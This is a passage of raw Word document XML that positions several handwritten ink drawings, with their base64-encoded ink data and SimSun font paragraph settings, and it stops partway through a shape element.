EsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAA&#10;AAQAAAAAAAAAAAAQAAAAAAAAAGRycy9QSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACgAAAAAA&#10;AAAAABAAAAAoBwAAZHJzL19yZWxzL1BLAQIUABQAAAAIAIdO4kB5GLyduAAAACEBAAAZAAAAAAAA&#10;AAEAIAAAAFAHAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsBAhQAFAAAAAgAh07iQJzw/TbV&#10;AAAACQEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kAr&#10;La68ngEAAIsDAAAOAAAAAAAAAAEAIAAAACQBAABkcnMvZTJvRG9jLnhtbFBLAQIUAAoAAAAAAIdO&#10;4kAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAEAAAAO4CAABkcnMvaW5rL1BLAQIUABQAAAAIAIdO4kCM&#10;MlOoyAIAAKwGAAAQAAAAAAAAAAEAIAAAABQDAABkcnMvaW5rL2luazEueG1sUEsFBgAAAAAKAAoA&#10;TAIAAHUJAAAAAA==&#10;">
                <v:imagedata r:id="rId32" o:title=""/>
                <o:lock v:ext="edit"/>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3625215</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>80010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="139700" cy="268605"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="40" name="墨迹 40"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId33">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="40" name="墨迹 40"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4311015" y="7928610"/>
                            <a:ext cx="139700" cy="268605"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:285.45pt;margin-top:6.3pt;height:21.15pt;width:11pt;z-index:251661312;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="UEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAEAAAAZHJzL1BLAwQUAAAACACHTuJAlSYegNYAAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbE2PwU7DMBBE70j8g7VI3KidqgltiNMDgvbChZYPcGITR8Tr&#10;YLtN+vfdnuC2uzOaeVttZzewswmx9yghWwhgBluve+wkfB3fn9bAYlKo1eDRSLiYCNv6/q5SpfYT&#10;fprzIXWMQjCWSoJNaSw5j601TsWFHw2S9u2DU4nW0HEd1EThbuBLIQruVI/UYNVoXq1pfw4ndytZ&#10;h2n3e4mr2X7s37JO5bumkPLxIRMvwJKZ058ZbviEDjUxNf6EOrJBQv4sNmQlYVkAI0O+WdGhoaHI&#10;gNcV//9BfQVQSwMEFAAAAAgAh07iQEC0ljCjAQAAiwMAAA4AAABkcnMvZTJvRG9jLnhtbK2TTU7D&#10;MBCF90jcwfKeJm7Tn0RNWVAhsQC6gAMYx24sYjsau017HVZcgRWnQeIYTP9oKUJCiJ3tsb55b549&#10;PF+YiswleO1sTlkrpkRa4Qptpzm9v7s8G1DiA7cFr5yVOV1KT89HpyfDps5k25WuKiQQhFifNXVO&#10;yxDqLIq8KKXhvuVqabGoHBgecAvTqADeIN1UUTuOe1HjoKjBCek9no43Rbolwm+ATikt5NiJmZE2&#10;bKggKx7Qki917elorVYpKcKtUl4GUqHXNO5SEnLaYX1cYCsW91NcPeQ0SZIujUZDnk2B16UWWz38&#10;N3qODBquLSr4RI154GQG+hvKaAHOOxVawplo42o9HrTE4qNBXdnHlS2WiBlkwtmA1iccwi6KdeEv&#10;LUyFE2iuXYFhiwr+OQkCmS5yClcF28u384u9gQnsbd3MJ0BW9xN8lpYblPT29Pz++kLwAOPZ2b/5&#10;CsBKtC39hF4oMKtMcMpkgfwOYzHD7Jc57aftQY+t+TyTi0AEXmCdtB+jCIEX2r1BD5/OQZcNbdfz&#10;IA0U8iX3w/1K5MEfGn0AUEsDBAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAZHJzL2luay9QSwME&#10;FAAAAAgAh07iQOhQgtlwAgAA8gUAABAAAABkcnMvaW5rL2luazEueG1stVRba9swFH4f7D8I9aEP&#10;s2zdfAtN+jAoDDYobQfbo+soiaktB1lu0n+/I/mSsqaDwRZMpHP7zjmfjnR1fWxq9KxMV7V6iVlI&#10;MVK6bNeV3i7x94cbkmHU2UKvi7rVaolfVIevVx8/XFX6qakX8I8AQXdu19RLvLN2v4iiw+EQHkTY&#10;mm3EKRXRF/307StejVFrtal0ZSFlN6nKVlt1tA5sUa2XuLRHOvsD9n3bm1LNZqcx5cnDmqJUN61p&#10;Cjsj7gqtVY100UDdPzCyL3vYVJBnqwxGPVTQQaIGR+dDfv59yM2bkKY4Aq2Ui98SRp6vxft135p2&#10;r4yt1ImioaHR8ILKQfa9DU0a1bV173jF6Lmoe2iXZ6GQiYyTJOc5E3Iug0VnOn+LDST8N2xg633s&#10;MJMsSd+UO/I29v6apNEyz8p0qLZqFExws5+Hx3Yw5U59b42fc045I4wTmj6wZCHEQsZuKKZcw2hO&#10;eI+m73Yz1qM5DaG3zBQOrR2qtd3Np0FDyngeC8FkLijcjGRu8PVpnAPaqWq7s/8CqWzrFuZ/HJAL&#10;6n+nS3Au+aayD+3n3jyrOY79OaLa6taoW5jIrjenKPqKV59oZvnMm+AvBxpfhju1WeIL/ywgHzko&#10;PP8yZ5QiFvKUcfWJJiiNZXBJOHz8kgaYCJxgGhCBUgQLR4lb4kli1IkCTWvuxBSxGMUByRHnTgYj&#10;5yQJSIa4QBwUDHEJaq/JCBtcMsRgB0G500hIIQPw4ogFgjBBYrdwsDFKuAQtp0SAQ8AyIuJRFpAQ&#10;fKTPC6EUCUB3BUK8A8udQhLwEUE64CXegXsRiWl2PYUzx3A3V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HkYvJ24AAAAIQEAABkAAABkcnMv&#10;X3JlbHMvZTJvRG9jLnhtbC5yZWxzhc+xasQwDAbgvdB3MNobJR3KUeJkOQ6ylhRuNY6SmMSysZzS&#10;e/t67MHBDRqE0PdLbf/rd/VDSVxgDU1VgyK2YXK8aPgeL28nUJINT2YPTBpuJNB3ry/tF+0mlyVZ&#10;XRRVFBYNa87xE1HsSt5IFSJxmcwheZNLmxaMxm5mIXyv6w9M/w3o7kw1TBrSMDWgxlssyc/tMM/O&#10;0jnYwxPnBxFoD8nBX/1eUJMWyhocb1iqqcqhgF2Ld491f1BLAwQUAAAACACHTuJAAxUp2gUBAAAt&#10;AgAAEwAAAFtDb250ZW50X1R5cGVzXS54bWyVkcFOwzAQRO9I/IPlK0qc9oAQatIDKUdAqHyAZW8S&#10;q/ba8prQ/j1O2l4QpeLgg70zb0br1XrvLBshkvFY80VZcQaovDbY1/xj+1w8cEZJopbWI9T8AMTX&#10;ze3NansIQCy7kWo+pBQehSA1gJNU+gCYJ52PTqZ8jb0IUu1kD2JZVfdCeUyAqUgTgzerFjr5aRPb&#10;7PPzsUkES5w9HYVTVs1lCNYomXJTMaL+kVKcEsrsnDU0mEB3uQYXvyZMk8sBJ99rXk00GtibjOlF&#10;ulxD6EhC+y+MMJZ/Q6aWjgrfdUZB2UZqs+0dxnOrS3RY+tar/8I3s+sa2+BO5LO4Qs8SZ88sMX92&#10;8w1QSwECFAAUAAAACACHTuJAAxUp2gUBAAAtAgAAEwAAAAAAAAABACAAAADtBwAAW0NvbnRlbnRf&#10;VHlwZXNdLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAEAAAALgFAABf&#10;cmVscy9QSwECFAAUAAAACACHTuJAihRmPNEAAACUAQAACwAAAAAAAAABACAAAADcBQAAX3JlbHMv&#10;LnJlbHNQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABAAAAAAAAAAAABAAAAAAAAAAZHJzL1BL&#10;AQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAEAAAANYGAABkcnMvX3JlbHMvUEsB&#10;AhQAFAAAAAgAh07iQHkYvJ24AAAAIQEAABkAAAAAAAAAAQAgAAAA/gYAAGRycy9fcmVscy9lMm9E&#10;b2MueG1sLnJlbHNQSwECFAAUAAAACACHTuJAlSYegNYAAAAJAQAADwAAAAAAAAABACAAAAAiAAAA&#10;ZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAAAAgAh07iQEC0ljCjAQAAiwMAAA4AAAAAAAAAAQAgAAAA&#10;JQEAAGRycy9lMm9Eb2MueG1sUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAQ&#10;AAAA9AIAAGRycy9pbmsvUEsBAhQAFAAAAAgAh07iQOhQgtlwAgAA8gUAABAAAAAAAAAAAQAgAAAA&#10;GgMAAGRycy9pbmsvaW5rMS54bWxQSwUGAAAAAAoACgBMAgAAIwkAAAAA&#10;">
                <v:imagedata r:id="rId34" o:title=""/>
                <o:lock v:ext="edit"/>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4874895</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>180340</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="55880" cy="989330"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="54" name="墨迹 54"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId35">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="54" name="墨迹 54"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="5560695" y="8028940"/>
                            <a:ext cx="55880" cy="989330"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:383.85pt;margin-top:14.2pt;height:77.9pt;width:4.4pt;z-index:251675648;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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5GLyduAAA&#10;ACEBAAAZAAAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc4XPsWrEMAwG4L3QdzDaGyUdylHiZDkO&#10;spYUbjWOkpjEsrGc0nv7euzBwQ0ahND3S23/63f1Q0lcYA1NVYMitmFyvGj4Hi9vJ1CSDU9mD0wa&#10;biTQd68v7RftJpclWV0UVRQWDWvO8RNR7EreSBUicZnMIXmTS5sWjMZuZiF8r+sPTP8N6O5MNUwa&#10;0jA1oMZbLMnP7TDPztI52MMT5wcRaA/JwV/9XlCTFsoaHG9YqqnKoYBdi3ePdX9QSwMEFAAAAAgA&#10;h07iQAMVKdoFAQAALQIAABMAAABbQ29udGVudF9UeXBlc10ueG1slZHBTsMwEETvSPyD5StKnPaA&#10;EGrSAylHQKh8gGVvEqv22vKa0P49TtpeEKXi4IO9M29G69V67ywbIZLxWPNFWXEGqLw22Nf8Y/tc&#10;PHBGSaKW1iPU/ADE183tzWp7CEAsu5FqPqQUHoUgNYCTVPoAmCedj06mfI29CFLtZA9iWVX3QnlM&#10;gKlIE4M3qxY6+WkT2+zz87FJBEucPR2FU1bNZQjWKJlyUzGi/pFSnBLK7Jw1NJhAd7kGF78mTJPL&#10;ASffa15NNBrYm4zpRbpcQ+hIQvsvjDCWf0Omlo4K33VGQdlGarPtHcZzq0t0WPrWq//CN7PrGtvg&#10;TuSzuELPEmfPLDF/dvMNUEsBAhQAFAAAAAgAh07iQAMVKdoFAQAALQIAABMAAAAAAAAAAQAgAAAA&#10;3ggAAFtDb250ZW50X1R5cGVzXS54bWxQSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAABgAAAAAA&#10;AAAAABAAAACpBgAAX3JlbHMvUEsBAhQAFAAAAAgAh07iQIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAg&#10;AAAAzQYAAF9yZWxzLy5yZWxzUEsBAhQACgAAAAAAh07iQAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQ&#10;AAAAAAAAAGRycy9QSwECFAAKAAAAAACHTuJAAAAAAAAAAAAAAAAACgAAAAAAAAAAABAAAADHBwAA&#10;ZHJzL19yZWxzL1BLAQIUABQAAAAIAIdO4kB5GLyduAAAACEBAAAZAAAAAAAAAAEAIAAAAO8HAABk&#10;cnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsBAhQAFAAAAAgAh07iQP/EytzaAAAACgEAAA8AAAAA&#10;AAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIUABQAAAAIAIdO4kBpuOejnwEAAIkDAAAO&#10;AAAAAAAAAAEAIAAAACkBAABkcnMvZTJvRG9jLnhtbFBLAQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAA&#10;AAAIAAAAAAAAAAAAEAAAAPQCAABkcnMvaW5rL1BLAQIUABQAAAAIAIdO4kCFnO67YQMAAPQHAAAQ&#10;AAAAAAAAAAEAIAAAABoDAABkcnMvaW5rL2luazEueG1sUEsFBgAAAAAKAAoATAIAABQKAAAAAA==&#10;">
                <v:imagedata r:id="rId36" o:title=""/>
                <o:lock v:ext="edit"/>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5387340</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="421005" cy="546735"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="56" name="墨迹 56"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId37">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="56" name="墨迹 56"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="6073140" y="8009890"/>
                            <a:ext cx="421005" cy="546735"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:424.2pt;margin-top:12.7pt;height:43.05pt;width:33.15pt;z-index:251677696;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" o:gfxdata="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&#10;99mTgE3b87+AfIymrxX+ZW7/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aAkAAFtDb250ZW50X1R5cGVzXS54bWxQSwECFAAKAAAA&#10;AACHTuJAAAAAAAAAAAAAAAAABgAAAAAAAAAAABAAAAAzBwAAX3JlbHMvUEsBAhQAFAAAAAgAh07i&#10;QIoUZjzRAAAAlAEAAAsAAAAAAAAAAQAgAAAAVwcAAF9yZWxzLy5yZWxzUEsBAhQACgAAAAAAh07i&#10;QAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAQAAAAAAAAAGRycy9QSwECFAAKAAAAAACHTuJAAAAAAAAA&#10;AAAAAAAACgAAAAAAAAAAABAAAABRCAAAZHJzL19yZWxzL1BLAQIUABQAAAAIAIdO4kB5GLyduAAA&#10;ACEBAAAZAAAAAAAAAAEAIAAAAHkIAABkcnMvX3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsBAhQAFAAA&#10;AAgAh07iQJEHiRvaAAAACgEAAA8AAAAAAAAAAQAgAAAAIgAAAGRycy9kb3ducmV2LnhtbFBLAQIU&#10;ABQAAAAIAIdO4kCJcxabogEAAIsDAAAOAAAAAAAAAAEAIAAAACkBAABkcnMvZTJvRG9jLnhtbFBL&#10;AQIUAAoAAAAAAIdO4kAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAEAAAAPcCAABkcnMvaW5rL1BLAQIU&#10;ABQAAAAIAIdO4kDJB5YT6AMAADwJAAAQAAAAAAAAAAEAIAAAAB0DAABkcnMvaW5rL2luazEueG1s&#10;UEsFBgAAAAAKAAoATAIAAJ4KAAAAAA==&#10;">
                <v:imagedata r:id="rId38" o:title=""/>
                <o:lock v:ext="edit"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="3780" w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3587115</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>163195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="61595" cy="476250"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="41" name="墨迹 41"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingInk">
                    <mc:AlternateContent xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                      <mc:Choice Requires="a14">
                        <w14:contentPart bwMode="clr" r:id="rId39">
                          <w14:nvContentPartPr>
                            <w14:cNvPr id="41" name="墨迹 41"/>
                            <w14:cNvContentPartPr/>
                          </w14:nvContentPartPr>
                          <w14:xfrm>
                            <a:off x="4272915" y="8209915"/>
                            <a:ext cx="61595" cy="476250"/>
                          </w14:xfrm>
                        </w14:contentPart>
                      </mc:Choice>
                    </mc:AlternateContent>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape id="_x0000_s1026" o:spid="_x0000_s1026" o:spt="75" style="position:absolute;left:0pt;margin-left:282.45pt;margin-top:12.85pt;height:37.5pt;width:4.85pt;z-index:251662336;mso-width-relative:page;mso-height-relative:page;" coordsize="21600,21600" 